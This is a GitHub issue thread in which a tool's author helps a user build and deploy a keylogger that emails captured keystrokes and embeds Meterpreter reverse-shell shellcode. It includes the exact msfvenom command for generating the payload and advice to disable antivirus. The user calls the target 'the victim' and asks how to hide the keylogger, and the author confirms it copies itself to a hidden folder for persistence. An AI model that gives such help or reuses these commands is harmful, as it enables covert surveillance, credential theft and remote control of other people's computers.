XLuma
commented
6 years ago @xp4xbox
Closed XLuma closed 6 years ago
XLuma
commented
6 years ago @xp4xbox
xp4xbox
commented
6 years ago You just need the raw shellcode, to generate it:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f python
it should generate something like:
buf = "\x06\x06"
buf += "\0x85"
buf += "\0x04"so all you have to do is remove the buf = and buf += so the final shellcode should be on a single line such as: \x06\x06\0x85\0x04.
XLuma
commented
6 years ago I would need to install the msfvenom framework first right ?
xp4xbox
commented
6 years ago Metasploit comes with msfvenom. So all you need to install is the metasploit framework.
btw you can edit your comments.
XLuma
commented
6 years ago Alright, thanks for the help ! I’ll test it tommorow ! (And yeah just saw that lol) And since you are here, do I need to do the same thing with your Python backdoor ?
xp4xbox
commented
6 years ago No, my python backdoor is completely independent. It is basically my take on a smaller version of meterpreter.
XLuma
commented
6 years ago Alright, thanks for the help ! Can’t wait to test those programs :p
XLuma
commented
6 years ago When I'm attempting to run the command (or view options) I,m always getting this error
C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:117:in generate_jar': android/apk/classes.dex not found (RuntimeError) from C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:38:ingenerate'
from C:/metasploit-framework/embedded/framework/lib/msf/core/payload.rb:204:in size' from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:158:inblock (2 levels) in recalculate'
from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:102:in each_pair' from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:102:inblock in recalculate'
from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:98:in each_pair' from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:98:inrecalculate'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:251:in block in load_modules' from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:248:ineach'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:248:in load_modules' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:119:inblock in load_modules'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in each' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:inload_modules'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:41:in block in add_module_path' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:ineach'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in add_module_path' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:50:inblock in init_module_paths'
from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in each' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:ininit_module_paths'
from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:121:in simplify' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:73:increate'
from C:/metasploit-framework/bin/../embedded/framework/msfvenom:46:in init_framework' from C:/metasploit-framework/bin/../embedded/framework/msfvenom:55:inframework'
from C:/metasploit-framework/bin/../embedded/framework/msfvenom:326:in `
any fix for that ?
xp4xbox
commented
6 years ago I am not sure, probably antivirus deleted the files. Make sure to turn you antivirus off and re-install metasploit.
XLuma
commented
6 years ago alright I'll try
XLuma
commented
6 years ago disabled my antivirus and reinstalled now I'm getting a different error from the previous
xp4xbox
commented
6 years ago What's the error.
XLuma
commented
6 years ago C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in initialize': Invalid argument @ rb_sysopen - C:/metasploit-framework/embedded/framework/modules/payloads/singles/cmd/windows/download_exec_vbs.rb (Errno::EINVAL) from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:inopen'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in read_module_content' from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:126:inload_module'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:238:in block in load_modules' from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:49:inblock (2 levels) in each_module_reference_name'
from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in block in find' from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:incatch'
from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in find' from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:40:inblock in each_module_reference_name'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:30:in foreach' from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:30:ineach_module_reference_name'
from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:237:in load_modules' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:119:inblock in load_modules'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in each' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:inload_modules'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:41:in block in add_module_path' from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:ineach'
from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in add_module_path' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:50:inblock in init_module_paths'
from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in each' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:ininit_module_paths'
from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:121:in simplify' from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:73:increate'
from C:/metasploit-framework/bin/../embedded/framework/msfvenom:46:in init_framework' from C:/metasploit-framework/bin/../embedded/framework/msfvenom:234:indump_payloads'
from C:/metasploit-framework/bin/../embedded/framework/msfvenom:306:in block in <main>' from C:/metasploit-framework/bin/../embedded/framework/msfvenom:303:ineach'
from C:/metasploit-framework/bin/../embedded/framework/msfvenom:303:in `
XLuma
commented
6 years ago finally got it to work ! just need to find my LPORT
xp4xbox
commented
6 years ago Lport can be any valid port. Such as 4444.
XLuma
commented
6 years ago Finally ! I succesfully builded the program to a .exe, I’ll test it
Thanks for the help !
XLuma
commented
6 years ago So I tested on VM, I bet the program succesfully launched because a cmd openned for like 0.1 second
I setted the timer for 120 second and specified an email to save the logs
But after 120 seconds, no logs in the specified path and email is there something i'm missing ?
xp4xbox
commented
6 years ago I am not sure why, but you cannot currently save logs to disk and email, you must have one or the other. By default it will send to your email, check in your Gmail to make sure that you allowed access for less secure apps.
XLuma
commented
6 years ago so I enabled everything and made sure acess for less secure app is enabled for the program, got it working but I'm not getting any logs... maybe it's because of the email (and also the storing option is via email no other option is enabled)
xp4xbox
commented
6 years ago Make sure your username and password are entered correctly. Other than that, I am not sure.
XLuma
commented
6 years ago Tested it on my own machine, it worked perfectly Does the program work if used on other computers that have a different IP from where it has been compiled ?
xp4xbox
commented
6 years ago IP has nothing to do with it, there have been problems in the past with py2exe and fresh operating systems.
XLuma
commented
6 years ago So the PC must have been up for like 5-10 minutes for the program to be running well ?
xp4xbox
commented
6 years ago No I mean PC's that haven't installed a lot of software such as Microsoft c++ packages.
XLuma
commented
6 years ago Ooooh okay Well thanks for the help ! Very appreciated Oh and since you are there I’d like to ask
Would it be possible to make some kind of installer ? Currently even with the added to startup, if the victim deletes the .exe, the keylogger doesn’t have a point, so making a installer that « installs » the keylogger to a specific path without asking for a path so it is « hidden » would be more handy
xp4xbox
commented
6 years ago I did do that, it doesn't work?
XLuma
commented
6 years ago Adding the program to startup won’t work if the program is deleted right ?
xp4xbox
commented
6 years ago It should since it copies itself tohidden folder.
XLuma
commented
6 years ago Oh okay then Thanks for the help, I’m now good :)
OS: [e.g. Windows 10] Commit/Build: [e.g. b227928]
Is Meterpreter needed when compiling ? If yes, how to I generate raw shellcode for that ?